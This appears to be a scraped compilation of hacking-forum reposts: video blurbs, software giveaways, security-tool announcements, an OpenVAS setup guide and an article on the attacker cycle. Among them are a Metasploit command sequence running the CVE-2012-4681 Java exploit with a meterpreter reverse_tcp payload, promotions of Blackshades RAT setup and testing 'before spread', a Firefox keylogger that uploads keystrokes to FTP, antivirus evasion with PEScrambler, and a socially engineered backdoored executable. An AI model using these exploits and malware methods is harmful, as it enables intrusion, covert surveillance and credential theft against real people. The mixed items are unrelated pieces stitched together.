Wubi

Today we're gonna be using a classic method to escalate privileges on a fully patched Windows box. Of course, we'll be using no other than the Python server & shell for the whole process. The reason for demonstrating this sole method is simple: privilege escalation methods/exploits vary from time to time and although some operating systems (especially the no longer supported ones) have specific exploits that work, current operating systems are constantly being patched... which leads security researchers to develop new exploits, which leads to new patches, etc... on that note, let's get started! Click here to read full article: Download BypassUAC from: TrustedSec - Information Security Made Simple Sursa YouTube

Use Nessus to scan for both known and previously unknown web application vulnerabilities. Sursa YouTube

Chip.de is giving away full version copies of WinSysClean X2 worth value $29. So hurry and grab it …. WinSysClean automatically optimizes the Windows operating system by removing unused and temporary files, invalid and unnecessary registry entries, unused shortcuts, and much more. WinSysClean uses complex analysis algorithms, includes over 84 cleaning, and repair functions. WinSysClean also includes practical Windows tuning features, such as generating desktop shortcuts of useful windows functions. Key Features of WinSysClean X2 : Windows Repair and Registry Cleaning Optimize PC Performance Windows Tuning User-friendly interface For Windows XP, Vista, 2003, 2008 Server, and Windows 7 (32 & 64-bit) Follow below steps and grab free copy of WinSysClean X2 Click here to visit promo page of WinSysClean X2 Enter your name, valid email address, We will receive an email from no-reply@usro.de with a confirmation link. Click on the confirmation link. Copy the serail key and note it down for further use. Sursa PenTestIT

Pentru Skype: cd /tmp && wget http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux/downloading.ubuntu32 && dpkg -i skype-ubuntu_4.0.0.8-1_i386.deb Ai deja "Task Manager" sub numele "System Monitor". Da`i si un sudo apt-get update && apt-get upgrade apt-get -f install

Intro to the XSS and the Reflected Attack This video show others method used to inject the Cross site scripting reflected Sursa Vimeo

Tu nu stapanesti limba materna, ce sanse ai avea asupra unui sistem de operare?

This release adds an update to the Java Applet attack for native 0day java exploits. Note that when the victim clicks cancel, the exploit still triggers. This is intentional. Sursa Vimeo

Etherwall is a free and open source network security tool that prevents Man in The Middle (MITM) through ARP Spoofing/Poisoning attacks. It Also prevent it from various attacks such as Sniffing, Hijacking, Netcut, DHCP Spoofing, DNS Spoofing, WEB Spoofing, and others. Features of Etherwall Daemon Processing ARP Packet Filtering Point to Point & Point to Multipoint Protection Realtime Protection System Logging Early Warning Support for networks Statically, Dynamically, or Both Supports for Ethernet Wired & Wireless interface (IEEE 802.3 & IEEE 802.11) Plugins / Tools Included Man Pages Easy to Use and Free Etherwallis a small and handy tool to install and once you install… forget it, just keep a watch on logs. Download Etherwall : etherwall-1.0.BETA3.tar.gz Sursa PenTestIT

Description: Vulnerability found exploited in the wild and discovered by Michael Schierl First details of the vulnerability the 2012-08-26 Source code of the vulnerability provided by jduck the 2012-08-26 Metasploit PoC provided the 2012-08-27 PoC provided by: Unknown jduck sinn3r juan vazquez Reference(s) : CVE-2012-4681 OSVDB-84867 BID-55213 Zero-Day Season is Not Over Yet Java 7 0-Day vulnerability information and mitigation Affected versions : Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and previous. Tested on Ubuntu 12.04 with : Firefox & Oracle JSE 1.7.0_06-b24 Description : This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome and Firefox across different platforms. Metasploit demo : use exploit/multi/browser/java_jre17_exec set SRVHOST 192.168.178.100 set TARGET 2 set PAYLOAD linux/x86/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid Sursa YouTube

https://www.youtube.com/watch?v=_GatrcgVWCo&feature=g-u-u Perkongsian Ilmu Komputer | computer knowledge sharing: RAT How to proper setup blackshades RAT for give control via phone supported. My cheap phone not support internet browser, so i simulate using VPS. same procedure indeed. Any other great tutor .available at Perkongsian Ilmu Komputer | computer knowledge sharing: RAT Sursa YouTube

http://www.youtube.com/watch?v=XMq-K-Fv18c Perkongsian Ilmu Komputer | computer knowledge sharing: Advance Test Your RAT Server Working Perfectly Before Spread Did you faced the problem your RAT server : ~ do not get connection between host after executed ~ lost connection after victim PC reboot You must run particular test, which is involve: ~ Test server work after execute ~ Test the inbound / outbound server connection ~ Check startup ~ Check server properly installed For detailed and tool download regarding this video was available in this site Perkongsian Ilmu Komputer | computer knowledge sharing: Advance Test Your RAT Server Working Perfectly Before Spread Sursa YouTube

WinZip Courier is worth $24.95 , download it for free and experience the easiest way to compress and email large. Zip, encrypt, and safely deliver large files without skipping a beat! Simply write an email, attach as many files as you need, and click Send—Courier will take care of the rest. Features of WinZip Courier Reduce email transmission times, bandwidth consumption, and storage space requirements Perform fast and efficient network-based installations with MSI Automatically enforce your organization’s password policy Control the compression and encryption methods used by your employees Comply with security and privacy requirements with one simple, cost-effective solution Automatically zip large attachments into smaller, manageable packages that deliver faster and cause fewer issues. Files still too big? Courier can send up to 2GB per message via the ZipSend web service. Sharing large files doesn’t have to be complicated! Don’t waste time configuring shared folders or learning new file delivery tools. Courier integrates seamlessly with your own email system so you can share files the way you always have. Follow below below mentioned steps to grab free WinZip Courier 3.5 Click here to visit promo page WinZip Courier 3.5 Download link and copy the license key is provided in the page. Sursa PenTestIT

In this episode of TekTip we take a look at the recent Backtrack release BT5 R3. While we list all of the new tools and updates, we look specifically at and demo inundator, cutycapt, rainbowcrack, twofi, uber harvest, jigsaw, and urlcrazy. inundator - intrusion detection false positives generator cutycapt - batch screenshots to be taken of web pages rainbowcrack - crack hashes with rainbowtables. twofi - take multiple search terms and return a word list sorted by most common first uberharvest - crawl through the website (and all the links within that website) searching for valid email addresses jigsaw - enumerating information about a company's employees. It is useful for Social Engineering or Email Phishing urlcrazy - Generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage. *Full update list and description at TekDefense.com -1aN0rmus Sursa YouTube

Part 16 of the Sqli-labs series based on error based sqlinjections, blind injection boolian type and time based type. This video is using POST based - BLIND injections time based and boolean based. Link to part 1: Link to part 2: Link to part 3: Link to part 4: Link to part 5: Link to part 6: Link to part 7: Link to part 8: Link to part 9: Link to part 10: Link to part 11: Link to part 13: Link to part 14: Link to part 15: website: http://dumy2dummies.blogspot.com sources: https://github.com/Audi-1/sqli-labs

This is a Remote Keylogger Add-on for Mozilla Firefox. It will automatically upload the keyslogs to a FTP host specified. This is a product under development and this is a preview video.

This tutorial will explain about making your executable undetectable from anti-virus using PEScrambler, a tool presented in DEFCON 16. Sursa YouTube

Today I am going to be demonstrating how to use a free dynamic DNS solution for our Python backdoor. Reasons to use such a service vary, like keeping a hostname reachable if you have a dynamic IP address, adding an extra layer of stealthiness to our current shell, or simply to stare at wireshark and see what happens -- my favorite channel! Let's do thisssss! Click here to read full article: Python Backdoor – Dynamic DNS | Technic Dynamic Click here to check out mystcaster's blog: Pirater comme un nul(l) Sursa YouTube

credits go to out milw0rm movies.... Sursa YouTube

Recently, an update Artillery version 0.6 was released! release starts the evolution of Artillery, and the launch of Project Artillery. Project Artillery will be getting some major releases in the next few months, starting with the launch of ATIF, the Artillery Threat Intelligence Feed. ATIF is a collection of Artillery servers customized and deployed around the world. They automatically feed back attacker IP addresses instantly to the main Artillery central repository and pushed out to the main TrustedSec website. Official Artillery 0.6 change log: fixed a bug in remove_ban that would not remove the ip address added threat intelligence feed – this is an automatic feed that will pull from trustedsec webservers around attacker IP addresses added ability to automatically block based on intelligence feed daily checks added to banlist fixed a bug when uninstall would not properly kill artillery added a check in the uninstall to see if artillery is actually running added some enhancements to the honeypot banning added new flag for intelligence feed in the config file added the ability to change threat feeds to a different server of your choice added threading to reloading the IP tables matrix, was causing a hang on other imports removed 3306 as a standard port, would cause conflicts at times if it was already installed added the ability to specify the threat intelligence feed server added the ability to configure your own threat intelligence feed server added ability to change the public directory for the HTTP server added ability to configure multiple threat feeds, can pull in multiple Artillery servers Artillery version 0.6 which now enables ATIF as well as starting your own ATIF servers. You can now place ATIF servers out on the Internet and point your other Artillery installations to them if you do not want to use the TrustedSec repositories. Download Artillery: Artillery 0.6 can be downloaded from the SVN at the following link: svn co / - Revision 1479: /artillery artillery/ Sursa PenTestIT

OpenVAS is also known as Open Vulnerability Assessment System. This is a vulnerability assessment tool like other (nexpose, Nessus, acunetix, Web Application Attack & Audit Framework, core Impact, IBM Rational scan, Web Inspect), but it’s free software. All OpenVAS products are free software. The latest version is 5.0 released in May 2012. OpenVAS was initially named GNessUs as a fork of the Nessus security scanner to allow future free development of the now-proprietary tool. The first time it was published by pen tester at Portcullis Computer security and it was again published by Tim Brown on Slashdot. Suppose you are a system admin, IT manager or security engineer and you need to protect your company’s computer or network. Then you are the person who knows all the weaknesses or we can say vulnerability. A key factor to successfully finding and exploiting vulnerabilities in remote / local systems is all about the amount of information you have in hand. Another key factor is hard work; if you rely solely on vulnerability scanners to do your work for you. you’re certain to miss many interesting and critical security holes. Vulnerability scanners can be so expensive like core-impact. Nessus (which used to be free) is now a paid subscription-based service, and other scanners such as SAINT are not too cheap either. Core-impact is awesome even brilliant software, well worth purchasing if you are a professional pen testing company with lots of clients, but some small companies can’t even consider core impact. So thanks to open source software, OpenVAS is to the rescue. OpenVAS is another brilliant vulnerability scanner. Configuration of OpenVAS is a bit of a pain in the head but is well worth the hard effort. Here we take a look at the basic setup process, how to use OpenVAS on Backtrack 5 and some scanning types. Kindly go through process very cleanly. Installing OpenVAS: The easiest way to installing all required plugins of the OpenVAS suite is to issue the following commands in a terminal window. The OpenVAS is a good package that holds all information required to download automatically and ready as a full suite tool. Menu entries of OpenVAS: After “apt-get install OpenVAS” command you can see the OpenVAS has been installed, and find all the menu entries in this location. Configuration of OpenVAS: Adding a new user, from the menu bar (list of OpenVAS) select AddUser and follow the instruction. There are some rules for the user which is admin in backtrack i.e. root. “Openvassd has a rules system which allows you to restrict the hosts that root has the right to test.” Like administrator in a Windows system. Here we have to give a password that we assign to the root user/account. Suppose the user is not an administrator, then we can write some rules for the user, and after completing the rule writing session press “ctrl+D” to exit. Here you can see after pressing ctrl+D it shows us Login user (root) and password in asterisk format and last but not least are rules, which we have not created here. OpenVAS check startup is a very important tool. While running it checks for problems and it gives you advice on how to fix them if necessary. OpenVAS-check-setup – > test completeness and readiness of OpenVAS-4 It checks step by step, checking OpenVAS scanner… OpenVAS Scanner version 3.2.3 Then it shows us what error exists and how to fix it. Like in the below screenshot which shows Error: No CA certificate file of OpenVAS scanner found. And how to fix it: Run ‘OpenVAS –mkcert’. After giving a suggestion to fix this basic error, a final error is shown: “Error: Your OpenVAS – 4 installation is not yet complete!” At the same time it asks us to provide feedback and report wrong results to help them improve the check routine. OpenVAS Mkcert (process to create certificate): this process is creating SSL certification for using OpenVAS. It is mandatory; if you think “what is the need of an SSL certificate?” then you should know that without Mkcert you can’t go to next step. For creating a certificate it will ask you about your time zone, city and your organization, along with some questions about how many days it will work, etc. The questions are easy, just write the answer correctly. As soon as we create our certificate we can later use these files from the following path: Certification Authority: Certificate = /usr /local /var /lib /openvas /ca /cacert .pem Private Key = /usr /local /var /lib /openvas /private /ca /cakey .pem OpenVAS server: Certificate = /usr /local /var /lib /openvas /ca /serversert .pem Private Key = /usr /local /var /lib /openvas /private /ca /cakey .pem OpenVAS NVT sync: This process is just like updating Metasploit for the latest update, exploit and even payload. After the NVT sync we will get the entire scanner that we will use for scanning. We need to do this process regularly for better results. When we start the NVT sync process, the system updates all NVTs for scanning which takes time, depending upon your Internet connection. In the updating process it uses some script for synchronizing an NVT collection with the ‘OpenVAS NVT feed’. We can find NVTs in the local system “/usr /local /var /lib /openvas /plugins”, and at the same time it also uses wget. Wget is software for downloading and crawling web sites. If you want to use wget, then you can find it on your local system at ” /usr /bin /wget “. You can manually download NVTs from “http:// www. Openvas.org /openvas – nvt – feed –current. Tar .bz2?. After updating NVTs it will show the screen below: This screen shot shows which NVTs are updated and what they are. As I said earlier it takes time as per your Internet connection, so wait for the update. Start OpenVAS scanner: We updated our basic scanner package. So it will take some time to recollect it all and to check for and load new NVTs. When we download a newer NVT then we add it to the list. After starting OpenVAS scanner it takes time to load all plugins… All plugins loaded. Start OpenVAS manager: The first thing we need to do is make a client certificate for OpenVAS manager; this is done by clicking on Start OpenVAS Manager in the menu or the following command. “OpenVAS-mkcert-client –n om –I” As soon as we give the above command it generate an RSA private key that is 1024 bit long. All the given information for certification is used here. After writing the above command the cert for client has been done. Now we need to rebuild the database as it is now out of date with newly added NVTs. If we do not rebuild the database then we might face an error. Rebuild Command for openvasmd: openvasmd –rebuild Obviously this will take some time to update the version information and database,so be patient. Start OpenVAS administrator: configuration of administrator is a really big deal. So be careful about this. We need to create an administrator user that we will be using to perform all of our vulnerability assessment activities. Command for configuration of administrator user: Openvasad –c ‘add_user’ –n openvasadmin –r admin As we all know about admin user and password, we need to rememberthem for the next use. So enter the proper username and password. After given the command for creating the user it updates his database with username andpassword, and no rule file is updated. Start OpenVAS Manager: Now it’s time to start OpenVAS manager. I am using a local system for all service, 127.0.0.1 known as the loopback IP address. Command for manager: “openvasmd –p 9390 –a 127.0.0.1? Start OpenVAS Administrator: Command to start administrator on the local machine: Openvasad –a 127.0.0.1 –p 9393 Start Greenbone Security Assistant: Time to start the next service, Greenbone Security Assistant. This again runs as a daemon in the background. Again we use our local loopback IP. Command for Greenbone Security Assistant: “gsad –http-only –listen=127.0.0.1 –p 9392? Congratulations! You have completed the installation process. I know it seems difficult, but it’s worth it when we use OpenVAS for scanning. OpenVAS user interfaces: Greenbone Security Desktop: now it’s time to start the user interface for scanning the product and daemons. This is the user interface, now you can use this is as a scanner. It is open source and because of this reason we find lots of vulnerabilities in our product. Web interface: Web interface is the next method or approach to login and use to scan web applications, like a scan for vulnerabilities. Open a browser and enter the following address: 127.0.0.1:9392 Then it shows you a login screena web application. But remember once you log in using a web browser your CPU usage goes through the roof and sometimes your system gets stuck for while so be patient. With the reference to above screenshot, after getting successful a login, at the left hand side bar you can see some option like tasks, new task, notes, overrides, and performance that all are related to scan management. The next and main thing is configuration, that is really important and I know you will learn this part by yourself. Some rough ideas about this are: scan config for configuration scan types, config which kind of target you have in target options, sometimes we need credentials to scan (web page login, systems user name & password), and we can schedule our tasks. All the best for your OpenVAS (Open Vulnerability Assessment System). Let me know if you need any assistance with it. Sursa InfoSec Resources

It’s a well-known saying that gathering maximum information about the enemy is half the work done in defeating him. The same holds true when you are about to attack a target (a potential victim); the first step is to gather as much information as possible. Information gathering can be broadly classified into two categories – Active and Passive. In an active reconnaissance phase, you probe the target directly to reveal information, and in passive reconnaissance, the attacker tries to extract information indirectly. Generally an attacker tries to seek information about the Domain Name, Network Blocks, and system architecture and system enumeration via the Internet. For gaining remote access into the victim’s PC, he would also seek information about authentication mechanisms. If the attack is happening within the network, the information under siege would be network protocols, TCP and UDP services, system enumeration, and general network topology and architecture. So usually the network range is determined initially which is then followed by discovering open ports on the target. Following this, the services and enumeration of users, workgroups, etc. takes place. Let’s start from the basics, and then proceed to the advanced tools in this article. Who.is: A very well-known tool to almost all the techies in the world, WHO IS can reveal the initial information about the target organization, which can help us launch a social engineering attack on the victim. Let’s look into the various types of information that we can possibly unearth via this tool. In the above mentioned screenshot, we get very important initial information about the organization being queried here. We get the geographic location of the organization along with its IP address and we are also able to know the server type that is running on the target. Looking further, now comes the interesting part. We get to see the administrative and technical contact details, and over here the email ID given seems to be the personal ID which reveals the name of the person too. We get the fax, telephone, and complete address of the contact person. Following which we also have information about the name servers used by the organization. GHDB – The Google Hacking Database An Initiative by Exploit-DB Google is the biggest tool any attacker can posses. Besides simple searching, Google provides advanced key words to be used in the search terms. These terms are known as Google Dorks. The exploit-db has collected all these dorks in one place and named it as the GHDB. What can be possibly unearthed from these? Here they are: Vulnerable servers and files over the Internet Files containing passwords and usernames Login portals Various online devices like camera, PC clients, etc. Advisories and vulnerabilities Nmap Tool In the previous two phases we saw how to gather as much information as possible about the target. Next, we will discuss a tool called Nmap – an acronym for Network Mapper, it helps to scan for open ports, open services, operating systems, etc. Various commands are used such as -sV, -O, -PO, which stands for service identification command, banner grabbing, and port open and close. The -sV command takes more time than other commands as it scans through the services, ports, open/close status, and also the vendor name. With this we get the network range, we get to know the ports and services, which leads us to the next phase called vulnerability assessment/research. In the above screenshot, the Nmap scanner shows whether the host is alive or dead. This also shows the open ports and the protocol used by them. We infer that the ports 135, 139 and 445 are open in the TCP mode. It’s a well known fact that an unpatched XP machine is vulnerable to MSRPC DCOM exploitation and also the netBIOS exploitation. The above command in NMAP demonstrates the services run by each port and their versions. It also shows us the operating system info. On the other hand, -O command in Nmap gives only the OS information. Vulnerability Assessment (VA)/Research: In this phase we look into all possible vulnerabilities and 0days with respect to the results obtained in the network scanning phase. Various online resources such as exploit-db.com and 1337day.com can be used to look into the 0days and vulnerabilities and their patch status Jargon alert: 0day (Zero-day): A vulnerability that is not patched/addressed by the vendor. So, considering the above scenario, when we search for Windows XP on the exploit database, we find a large number of vulnerabilities. It’s up to us now to find a close match and verify if the above-mentioned vulnerabilities exist in the remote system. This work can be done easily by using a framework called metasploit, to be discussed in the following section. From the VA research phase we move on to perform the attack. This attack depends totally on the previous two phases discussed above. We perform attacks using a piece of code known as an exploit. We perform post-exploitation tasks using snippets of code called payloads. Metasploit development framework is one of the best exploit development frameworks which have been developed on Ruby. It contains a huge list of payloads and exploits for performing an attack. As you can see, from the exploit database we cross-checked to find that an RPC DCOM buffer overflow vulnerability exists in an unpatched Windows XP. Thus, we searched the exploit on . Metasploit, which makes our task easy by automating the exploitation process. From here we go around setting payloads and exploiting the system. Backdoors and Malwares for Maintaining Access As an attacker I wouldn’t want to be doing all these phases again and again, and I would prefer to maintain access on the target. This is achieved by the use of binders and backdoored executables. We’ll see how a backdoored executable can be created using the Metasploit framework. This approach uses the classic social engineering tactic to voluntarily make the victim download and open the file. The skill required to do this is left to the creativity of the attacker. This creates the backdoored executable. Assume that the social engineering succeeds, and the victim opens your executable: Then I run this server in my attacker machine to listen to the connection from the victim when he clicks it. As soon as he clicks on the executable and runs it: A meterpreter is opened in the attacker server and the system is owned, as shown in the previous figure. Thus we can make use of backdoored executables in our attacks using the Metasploit framework. Malwares for Making Money Over the years the Internet has evolved with many money-making affiliate programs. Hackers try to maintain a large network of computers which automatically installs and indirectly earns a source of considerable income to the attacker. Jargon alert: Botnet: A huge number of computers run with a command and control server which sends instructions to the other computers in the network. These computers reply back and send/carry out operations as instructed by the C & C server. This large network of computers is called Botnet. Web Application Attacks Web applications can be footprinted using the WhatWeb tool on the backtrack machine. This tool provides details about the IP address, server operating systems, and domain-specific information. Post vulnerability research phase, web application attacks are of various types. A few famous ones include: SQL injection, Cross-site scripting (XSS), and CSRF. See WhatWeb in action: This tool shows us the geographic location, IP address, HTTP server being run on the target, CMS, and other kinds of information which play a crucial role in web application analysis and reconnaissance. This article provides basic information regarding various ways in which exploitation is carried out. We have revisited the hacker cycle with shades of gray to the article. There are more tools available out there which are ready for some action. The knowledge of hacking isn’t something that gets you money nor steals credentials. It simply means knowing your system in and out – its weaknesses and rectifying them to secure yourself from the malicious people. Sursa InfoSec Resources

Most of us own multiple computers, hard disks and removable drives it would make perfect sense to have an universally accessible combined data storage pool. Free utility software Greyhole does exactly that. Some Greyhole usage statistics The average Greyhole pool size is 6.4TB, and contains 5 drives. The biggest one has 43TB, and uses 26 drives. The average Greyhole user uses his pool at 67% of its capacity. Backend greyhole uses Samba to create a storage pool of all available hard drives, allowing users to create redundant copies of there files preventing data loss when part of their hardware fails. Users can add and configure as many disk drives (internal, external, USB, e-Sata, Firewire) as they wish in their storage pool whose resulting size will be the sum of total free space in all the included disk drives. Greyhole file copies are regular files, visible on any machine, without any hardware or software required. If you take out one hard drive from your pool, and mount it anywhere else, you’ll be able to see all the files that Greyhole stored on it. They will have the same filenames, and they’ll be in the same directories you’d expect them to be Video tutorial on Greyhole Download Greyhole: Greyhole v0.9.22 - Greyhole Sursa PenTestIT